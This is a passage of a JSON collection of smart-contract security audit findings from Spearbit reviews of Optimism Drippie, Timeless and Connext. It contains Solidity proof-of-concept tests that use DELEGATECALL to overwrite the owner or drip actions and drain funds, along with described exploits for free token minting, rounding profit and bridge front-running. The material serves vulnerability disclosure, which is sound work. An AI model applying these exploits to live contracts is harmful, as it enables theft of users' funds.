active/paused drip to paused/active 10 etc.. Change drips interval: Prevent a drip from being executed any more by setting interval to a very high value Allow a drip to be executed more frequently by lowering the interval value Enable reentrancy by setting interval to 0 Change drips actions: Override an action to send drips contract balance to an arbitrary address etc.. Test example showcasing the issue: contract ChangeDrip { address public owner; mapping(string => Drippie.DripState) public drips; function someInnocentFunction() external { drips[\"FUND_BRIDGE_WALLET\"].config.actions[0] = Drippie.DripAction({ target: payable(address(1024)), data: new bytes(0), value: 1 ether }); } } 11 function test_canDELEGATECALLAllowReplaceAction() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Create an action with name \"FUND_BRIDGE_WALLET\" that have the function // To fund a wallet vm.startPrank(deployer); string memory fundBridgeWalletName = \"FUND_BRIDGE_WALLET\"; Drippie.DripAction[] memory actions = new Drippie.DripAction[](1); // The first action will send Bob 1 ether actions[0] = Drippie.DripAction({ target: payable(address(alice)), data: new bytes(0), value: 1 ether ,! }); Drippie.DripConfig memory config = createConfig(100, IDripCheck(address(checkTrue)), new bytes(0), actions); drippie.create(fundBridgeWalletName, config); drippie.status(fundBridgeWalletName, Drippie.DripStatus.ACTIVE); vm.stopPrank(); // Deploy the malicius contract vm.prank(attacker); ChangeDrip changeDripContract = new ChangeDrip(); // make the owner of drippie call via DELEGATECALL an innocentfunction of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(changeDripContract), abi.encodeWithSignature(\"someInnocentFunction()\"), 1000000); ,! // Now the drip action should have changed, anyone can execute it and funds would be sent to // the attacker and not to the bridge wallet drippie.drip(fundBridgeWalletName); // Assert we have drained Drippie assertEq(attacker.balance, 1 ether); assertEq(address(drippie).balance, 9 ether); } Scenario 3 Calling a malicious contract or accidentally calling a contract which does not account for Drippies storage layout can result in owner being overwritten. Test example showcasing the issue: contract GainOwnership { address public owner; function someInnocentFunction() external { owner = address(1024); } } 12 function test_canDELEGATECALLAllowOwnerLoseOwnership() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Deploy the malicius contract vm.prank(attacker); GainOwnership gainOwnershipContract = new GainOwnership(); // make the owner of drippie call via DELEGATECALL an innocentfunction of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(gainOwnershipContract), abi.encodeWithSignature(\"someInnocentFunction()\"), 1000000); ,! // Assert that the attacker has gained onwership assertEq(drippie.owner(), attacker); // Steal all the funds vm.prank(attacker); drippie.withdrawETH(payable(attacker)); // Assert we have drained Drippie assertEq(attacker.balance, 10 ether); assertEq(address(drippie).balance, 0 ether); }", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Low Risk" + ] + }, + { + "title": "Use calldata over memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Some gas savings if function arguments are passed as calldata instead of memory.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "Avoid String names in Events and Mapping Key", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Drip events emit an indexed nameref and the name as a string. These strings must be passed into every drip call adding to gas costs for larger strings.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "Avoid Extra sloads on Drippie.status", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Information for emitting event can be taken from calldata instead of reading from storage. Can skip repeat drips[_name].status reads from storage.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "Use Custom Errors Instead of Strings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "To save some gas the use of custom errors leads to cheaper deploy time cost and run time cost. The run time cost is only relevant when the revert condition is met.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "Increment In The For Loop Post Condition In An Unchecked Block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "This is only relevant if you are using the default solidity checked arithmetic. i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } }", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Gas Optimization" + ] + }, + { + "title": "DripState.count Location and Use", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "DripState.count is recorded and never used within the Drippie or IDripCheck contracts. DripState.count is also incremented after all external calls, inconsistent with Checks, Effects, Interactions con- vention.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Type Checking Foregone on DripCheck", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Passing params as bytes makes for a flexible DripCheck, however, type checking is lost.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Confirm Blind ERC721 Transfers are Intended", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "AssetReceiver uses transferFrom instead of safeTransferFrom. The callback on safeTransferFrom often poses a reentrancy risk but in this case the function is restricted to onlyOwner.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Code Contains Empty Blocks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Its best practice that when there is an empty block, to add a comment in the block explaining why its empty. While not technically errors, they can cause confusion when reading code.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Code Structure Deviates From Best-Practice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The best-practice layout for a contract should follow this order: State variables. Events. Modifiers. Constructor. Functions. Function ordering helps readers identify which functions they can call and find constructor and fallback functions easier. Functions should be grouped according to their visibility and ordered as: constructor, receive function (if ex- ists), fallback function (if exists), external, public, internal, private. Some constructs deviate from this recommended best-practice: structs and mappings after events.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Missing or Incomplete NatSpec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Some functions are missing @notice/@dev NatSpec comments for the function, @param for all/some of their parameters and @return for return values. Given that NatSpec is an important part of code documentation, this affects code comprehension, auditability and usability.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Checking Boolean Against Boolean", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "executable returns a boolean in which case the comparison to true is unnecessary. executable also reverts if any precondition check fails in which case false will never be returned.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Drippie.executable Never Returns false Only true or Reverts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "executable(string memory _name) public view returns (bool). The executable implemented in the Drippie contract has the following signature From the signature and the natspec documentation @return True if the drip is executable, false other- wise. Without reading the code, a user/developer would expect that the function returns true if all the checks passes otherwise false but in reality the function will always return true or revert. Because of this behavior, a reverting drip that do not pass the requirements inside executable will never revert with the message present in the following code executed by the drip function require( executable(_name) == true, \"Drippie: drip cannot be executed at this time, try again later\" );", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Drippie Use Case Notes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Drippie intends to support use cases outside of the initial hot EOA top-up use case demonstrated by Optimism. To further clarify, weve noted that drips support: Sending eth External function calls with fixed params Preconditions Examples include, conditionally transferring eth or tokens. Calling an admin function iff preconditions are met. Drips do not support: Updating the drip contract storage Altering params Postconditions Examples include, vesting contracts or executing Uniswap swaps based on recent moving averages (which are not without their own risks). Where dynamic params or internal accounting is needed, a separate contract needs to be paired with the drip.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Augment Documentation for dripcheck.check Indicating Precondition Check Only Performed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Before executing the whole batch of actions the drip function call executable that check if the drip can be executed. Inside executable an external contract is called by this instruction require( state.config.dripcheck.check(state.config.checkparams), \"Drippie: dripcheck failed so drip is not yet ready to be triggered\" ); Optimism provided some examples like checking if a target balance is below a specific threshold or above that threshold, but in general, the dripcheck.check invocation could perform any kind of checks. The important part that should be clear in the natspec documentation of the drip function is that that specific check is performed only once before the execution of the bulk of actions.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Considerations on the drip state.last and state.config.interval values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "When the drip function is called by an external actor, the executable is executed to check if the drip meets all the needed requirements to be executed. The only check that is done regarding the drip state.last and state.config.interval is this require( state.last + state.config.interval <= block.timestamp, \"Drippie: drip interval has not elapsed since last drip\" ); The state.time is never really initialized when the create function is called, this means that it will be automatically initialized with the default value of the uint256 type: 0. Consideration 1: Drips could be executed as soon as created Depending on the value set to state.config.interval the executables logic implies that as soon as a drip is created, the drip can be immediately (even in the same transaction) executed via the drip function. Consideration 2: A very high value for interval could make the drip never executable block.timestamp represents the number of seconds that passed since Unix Time (1970-01-01T00:00:00Z). When the owner of the Drippie want to create a \"one shot\" drip that can be executed immediately after creation but only once (even if the owner forgets to set the drips status to ARCHIVED) he/she should be aware that the max value that he/she can use for the interval is at max block.timestamp. This mean that the second time the drip can be executed is after block.timestamp seconds have been passed. If, for example, the owner create right now a drip with interval = block.timestamp it means that after the first execution the same drip could be executed after ~52 years (~2022-1970).", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Support ERC1155 in AssetReceiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "AssetReceiver support ERC20 and ERC721 interfaces but not ERC1155.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Reorder DripStatus Enum for Clarity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The current implementation of Drippie contract has the following enum type: enum DripStatus { NONE, // uint8(0) ACTIVE, PAUSED, ARCHIVED } When a drip is created via the create function, its status is initialized to PAUSED (equal to uint8(2)) and when it gets activated its status is changed to ACTIVE (equal to uint8(1)) So, the status change from 0 (NONE) to 2 (PAUSED) to 1 (ACTIVE). Switching the order inside the enum DripStatus definition between PAUSED and ACTIVE would make it more clean and easier to understand.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "_gas is Unneeded as Transactor.CALL and Transactor.DELEGATECALL Function Argument", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "The caller (i.e. contract owner) can control desired amount of gas at the transaction level.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Licensing Conflict on Inherited Dependencies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Solmate contracts are AGPL Licensed which is incompatible with the MIT License of Drippie related contracts.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Rename Functions for Clarity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "status The status(string memory _name, DripStatus _status) function allows the owner to update the status of a drip. The purpose of the function, based on the name, is not obvious at first sight and could confuse a user into believing that its a view function to retrieve the status of a drip instead of mutating its status. executable The executable(string memory _name) public view returns (bool) function returns true if the drip with name _name can be executed.", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Owner Has Permission to Drain Value from Drippie Contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", + "body": "Consider the following scenarios. Scenario 1 Owner may create arbitrary drips, including a drip to send all funds to themselves. Scenario 2 AssetReceiver permits owner to withdraw ETH, ERC20 tokens, and ERC721 tokens. Scenario 3 Owner may execute arbitrary calls. Transactor.CALL function is a function that allows the owner of the contract to execute a \"general purpose\" low- level call. function CALL( address _target, bytes memory _data, uint256 _gas, uint256 _value ) external payable onlyOwner returns (bool, bytes memory) { return _target.call{ gas: _gas, value: _value }(_data); } The function will transfer _value ETH present in the contract balance to the _target address. The function is also payable and this mean that the owner can send along with the call some funds. Test example showcasing the issue: 23 function test_transactorCALLAllowOwnerToDrainDrippieContract() public { bool success; vm.deal(deployer, 0 ether); vm.deal(bob, 0 ether); vm.deal(address(drippie), 1 ether); vm.prank(deployer); // send 1 ether via `call` to a contract that cannot receive them (success, ) = drippie.CALL{value: 0 ether}(bob, \"\", 100000, 1 ether); assertEq(success, true); assertEq(address(drippie).balance, 0 ether); assertEq(bob.balance, 1 ether); }", + "labels": [ + "Spearbit", + "OptimismDrippie", + "Severity: Informational" + ] + }, + { + "title": "Mint PerpetualYieldTokens for free by self-transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The PYT.transfer and transferFrom functions operate on cached balance values. When transfer- ring tokens to oneself the decreased balance is overwritten by an increased balance which makes it possible to mint PYT tokens for free. Consider the following exploit scenario: Attacker A self-transfers by calling token.transfer(A, token.balanceOf(A)). balanceOf[msg.sender] is rst set to zero but then overwritten by balanceOf[to] = toBalance + amount, doubling As balance.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Critical Risk" + ] + }, + { + "title": "xPYT auto-compound does not take pounder reward into account", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Conceptually, the xPYT.pound function performs the following steps: 1. Claims yieldAmount yield for itself, deposits the yield back to receive more PYT/NYT (Gate.claimYieldEnter). 2. Buys xPYT with the NYT. 3. Performs a ERC4626.redeem(xPYT) with the bought amount, burning xPYT and receiving pytAmountRedeemed PYT. 4. Performs a ERC4626.deposit(pytAmountRedeemed + yieldAmount = pytCompounded). 5. Pays out a reward in PYT to the caller. The assetBalance is correctly updated for the rst four steps but does not decrease by the pounder reward which is transferred out in the last step. The impact is that the contract has a smaller assets (PYT) balance than what is tracked in assetBalance. 1. Future depositors will have to make up for it as sweep computes the difference between these two values. 2. The xPYT exchange ratio is wrongly updated and withdrawers can redeem xPYT for more assets than they should until the last withdrawer is left holding valueless xPYT. Consider the following example and assume 100% fees for simplicity i.e. pounderReward = pytCompounded. Vault total: 1k assets, 1k shares total supply. pound with 100% fee: claims Y PYT/NYT. swaps Y NYT to X xPYT. redeems X xPYT for X PYT by burning X xPYT (supply -= X, exchange ratio is 1-to-1 in example). assetBalance is increased by claimed Y PYT pounder receives a pounder reward of X + Y PYT but does not decrease assetBalance by pounder reward X+Y. Vault totals should be 1k-X assets, 1k-X shares, keeping the same share price. Nevertheless, vault totals actually are 1k+Y assets, 1k-X shares. Although pounder receives 100% of pound- ing rewards the xPYT price (assets / shares) increased.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: High Risk" + ] + }, + { + "title": "Wrong yield accumulation in claimYieldAndEnter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The claimYieldAndEnter function does not accrue yield to the Gate contract itself (this) in case xPYT was specied. The idea is to accrue yield for the mint recipient rst before increasing/reducing their balance to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are minted to the Gate before its yield is accrued. Currently, the transfer from this to xPYT through the xPYT.deposit call accrues yield for this after the tokens have been minted to it (userPYTBalance * (updatedYieldPerToken - actualUserYieldPerToken) / PRECI- SION) and its balance increased. This leads to it receiving a larger yield amount than it should have.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: High Risk" + ] + }, + { + "title": "Swapper left-over token balances can be stolen", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The Swapper contract may never have any left-over token balances after performing a swap because token balances can be stolen by anyone in several ways: By using Swapper.doZeroExSwap with useSwapperBalance and tokenOut = tokenToSteal Arbitrary token approvals to arbitrary spenders can be set on behalf of the Swapper contract using UniswapV3Swapper.swapUnderlyingToXpyt.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: High Risk" + ] + }, + { + "title": "TickMath might revert in solidity version 0.8", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "UniswapV3s TickMath library was changed to allow compilations for solidity version 0.8. However, adjustments to account for the implicit overow behavior that the contract relies upon were not performed. The In UniswapV3xPYT.sol is compiled with version 0.8 and indirectly uses this library through the OracleLibrary. the worst case, it could be that the library always reverts (instead of overowing as in previous versions), leading to a broken xPYT contract. The same pragma solidity >=0.5.0; instead of pragma solidity >=0.5.0 <0.8.0; adjustments have been made for the OracleLibrary and PoolAddress contracts. However, their code does not rely on implicit overow behavior.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Medium Risk" + ] + }, + { + "title": "Rounding issues when exiting a vault through shares", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "When exiting a vault through Gate.exitToVaultShares the user species a vaultSharesAmount. The amount of PYT&NYT to burn is determined by a burnAmount = _vaultSharesAmountToUnderlying- this function in derived YearnGate and ERC4626 Amount(vaultSharesAmount) call. All contracts round down the burnAmount. This means one needs to burn fewer amounts than the value of the received vault shares. implementations of This attack can be protable and lead to all vault shares being stolen If the gas costs of this attack are low. This can be the case with vault & underlying tokens with a low number of decimals, highly valuable shares, or cheap gas costs. Consider the following scenario: 7 Imagine the following vault assets: totalAssets = 1.9M, supply = 1M. Therefore, 1 share is theoretically worth 1.9 underlying. Call enterWithUnderlying(underlyingAmount = 1900) to mint 1900 PYT/NYT (and the gate receives 1900 * supply / totalAssets = 1000 vault shares). Call exitToVaultShares(vaultSharesAmount = 1), then burnAmount = shares.mulDivDown(totalAssets(), supply) = 1 * totalAssets / supply = 1. This burns 1 \"underlying\" (actually PYT/NYT but they are 1-to-1), but receive 1 vault share (worth 1.9 underlying). Repeat this for up to the minted 1900 PYT/NYT. Can redeem the 1900 vault shares for 3610 underlying directly at the vault, making a prot of 3610 - 1900 = 1710 underlying.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Medium Risk" + ] + }, + { + "title": "Possible outstanding allowances from Gate", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The vault parameter of Gate.enterWithUnderlying can be chosen by an attacker in such a way that underlying = vault.asset() is another vault token of the Gate itself. The subsequent _depositInto- Vault(underlying, underlyingAmount, vault) call will approve underlyingAmount of underlying tokens to the provided vault and could in theory allow stealing from other vault shares. This is currently only exploitable in very rare cases because the caller also has to transfer the underlyingAmount to the gate contract rst. For example, when transferring underlyingAmount = type(uint256).max is possible due to ashloans/ashmints and the vault shares implement approvals in a way that do not decrease anymore if the allowance is type(uint256).max, as is the case with ERC4626 vaults.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Factory.sol owner can change fees unexpectedly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The Factory.sol owner may be able to front run yield calculations in a gate implementation and change user fees unexpectedly.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Low uniswapV3TwapSecondsAgo may result in AMM manipulation in pound()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The lower the value of uniswapV3TwapSecondsAgo is set with at construction creation time the easier It becomes easier for attackers to it becomes for an attacker to manipulate the results of the pound() function. manipulate automated market maker price feeds with a lower time horizon, requiring less capital to manipulate prices, although users may simply not use an xPYT contract that sets uniswapV3TwapSecondsAgo too low.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "UniswapV3Swapper uses wrong allowance check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Before the UniswapV3Swapper can exit a gate, it needs to set an XPYT allowance to the gate. The following check determines if an approval needs to be set: if ( args.xPYT.allowance(address(this), address(args.gate)) < tokenAmountOut ) { args.xPYT.safeApprove(address(args.gate), type(uint256).max); } args.gate.exitToUnderlying( args.recipient, args.vault, args.xPYT, tokenAmountOut ); The tokenAmountOut is in an underlying token amount but A legitimate gate.exitToUnderlying address(swapper)) checks allowance[swapper][gate] >= previewWithdraw(tokenAmountOut). is compared against an xPYT shares amount. xPYT.withdraw(tokenAmountOut, address(gate), call will call", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Missing check that tokenIn and tokenOut are different", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The doZeroExSwap() function takes in two ERC20 addresses which are tokenIn and tokenOut. The problem is that the doZeroExSwap() function does not check if the two token addresses are different from one another. Adding this check can reduce possible attack vectors.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Gate.sol gives unlimitted ERC20 approval on pyt for arbitrary address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "A malicious contract may be passed into the claimYieldAndEnter() function as xPYT and given full control over any PYT the contract may ever hold. Even though PYT is validated to be a real PYT contract and the Gate.sol contract isnt expected to have any PYT in it, it would be safer to remove any unnecessary approvals.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Constructor function does not check for zero address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The constructor function does not check if the addresses passed in are zero addresses. This check can guard against errors during deployment of the contract.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Accruing yield to msg.sender is not required when minting to xPYT contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The _exit function always accrues yield to the msg.sender before burning new tokens. The idea is to accrue yield for the recipient rst before increasing/reducing their balance to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are burned on the Gate and not msg.sender.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Low Risk" + ] + }, + { + "title": "Unlocked solidity pragmas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Most of the implementation code uses a solidity pragma of 0.8.4. contracts that use different functions. Unlocked solidity pragmas can result in unexpected behaviors or errors with different compiler versions.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "No safeCast in UniswapV3Swappers _swap.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "It should be noted that solidity version 0.8.0 doesnt revert on overow when type-casting. For example, if you tried casting the value 129 from uint8 to int8, it would overow to -127 instead. This is because signed integers have a lower positive integer range compared to unsigned integers i.e -128 to 127 for int8 versus 0 to 255 for uint8.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "One step critical address change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Setting the owner in Ownable is a one-step transaction. This situation enables the scenario of contract functionality becoming inaccessible or making it so a malicious address that was accidentally set as owner could compromise the system.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Missing zero address checks in transfer and transferFrom functions.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The codebase uses solmates ERC-20 implementation. It should be noted that this library sacrices user safety for gas optimization. As a result, their ERC-20 implementation doesnt include zero address checks on transfer and transferFrom functions.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Should add indexed keyword to deployed xPYT event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The DeployXPYT event only has the ERC20 asset_ marked as indexed while xPYT deployed can also have the indexed key word since you can use up to three per event and it will make it easier for bots to interact off chain with the protocol.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Missing check that tokenAmountIn is larger than zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "In doZeroExSwap() there is no check that the tokenAmountIn number is larger than zero. Adding this check can add more thorough validation within the function.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "ERC20 does not emit Approval event in transferFrom", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The ERC20 contract does not emit new Approval events with the updated allowance in transferFrom. This makes it impossible to track approvals solely by looking at Approval events.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Use the ofcial UniswapV3 0.8 branch", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The current repositories create local copies of UniswapV3s codebase and manually migrate the contracts to Solidity 0.8. For FullMath.sol this also leads to some small gas optimizations in this LOC as it uses 0 instead of type(uint256).max + 1.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "No checks that provided xPYT matches PYT of the provided vault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "The Gate contracts has many functions that allow specifying vault and a xPYT addresses as pa- rameter. The underlying of the xPYT address is assumed to be the same as the vaults PYT but this check is not enforced. Users that call the Gate functions with an xPYT contract for the wrong vault could see their de- posit/withdrawals lost.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Protocol does not work with non-standard ERC20 tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", + "body": "Some ERC20 tokens make modications to their ERC20s transfer or balanceOf functions. One kind include deationary tokens that charge certain fee for every transfer or transferFrom. Others are rebasing tokens that increase in balance over time. Using these tokens in the protocol can lead to issues such as: Entering a vault through the Gate will not work as it tries to deposit the pre-fee amount instead of the received post-fee amount. The UniswapV3Swapper tries to enter a vault with the pre-fee transfer amount.", + "labels": [ + "Spearbit", + "Timeless", + "Severity: Informational" + ] + }, + { + "title": "Lack of transferId Verification Allows an Attacker to Front-Run Bridge Transfers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The onReceive() function does not verify the integrity of transferId against all other parameters. Although the onlyBridgeRouter modifier checks that the call originates from another BridgeRouter (assuming a correct configuration of the whitelist) to the onReceive() function, it does not check that the call originates from another Connext Diamond. Therefore, allowing anyone to send arbitrary data to BridgeRouter.sendToHook(), which is later interpreted as the transferId on Connexts NomadFacet.sol contract. This can be abused by a front-running attack as described in the following scenario: Alice is a bridge user and makes an honest call to transfer funds over to the destination chain. Bob does not make a transfer but instead calls the sendToHook() function with the same _extraData but passes an _amount of 1 wei. Both Alice and Bob have their tokens debited on the source chain and must wait for the Nomad protocol to optimistically verify incoming TransferToHook messages. Once the messages have been replicated onto the destination chain, Bob processes the message before Alice, causing onReceive() to be called on the same transferId. However, because _amount is not verified against the transferId, Alice receives significantly less tokens and the s.reconciledTransfers mapping marks the transfer as reconciled. Hence, Alice has effectively lost all her tokens during an attempt to bridge them. function onReceive( uint32, // _origin, not used uint32, // _tokenDomain, not used bytes32, // _tokenAddress, of canonical token, not used address _localToken, uint256 _amount, bytes memory _extraData ) external onlyBridgeRouter { bytes32 transferId = bytes32(_extraData); // Ensure the transaction has not already been handled (i.e. previously reconciled). if (s.reconciledTransfers[transferId]) { revert NomadFacet__reconcile_alreadyReconciled(); } // Mark the transfer as reconciled. s.reconciledTransfers[transferId] = true; Note: the same issues exists with _localToken. As a result a malicious user could perform the same attack by using a malicious token contract and transferring the same amount of tokens in the call to sendToHook().", + "labels": [ + "Spearbit", + "Connext", + "Severity: Critical Risk" + ] + }, + { + "title": "swapOut allows overwrite of token balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The 